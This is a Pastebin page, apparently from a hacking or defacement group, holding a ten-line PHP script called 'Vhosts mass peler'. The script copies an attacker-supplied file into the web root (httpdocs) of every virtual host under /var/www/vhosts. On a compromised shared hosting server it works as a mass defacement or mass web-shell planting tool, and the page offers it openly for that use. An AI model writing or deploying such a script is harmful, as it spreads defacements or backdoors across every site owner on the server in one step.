AZZATSSINS_CYBERSERK

Simple Vhosts mass peler

Mar 30th, 2017
215
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.22 KB | None | 0 0
  1. <?php
  2. /*VHOST MASS PELER
  3. php file.php scriptnya scriptpepes
  4. */
  5. $tytyd = $argv[1];
  6. $henceut = $argv[2];
  7. $azx = scandir("/var/www/vhosts");
  8. foreach($azx as $ax) {
  9. copy($tytyd,"/var/www/vhosts/".$ax."/httpdocs/".$henceut);
  10. }
Add Comment
Please, Sign In to add comment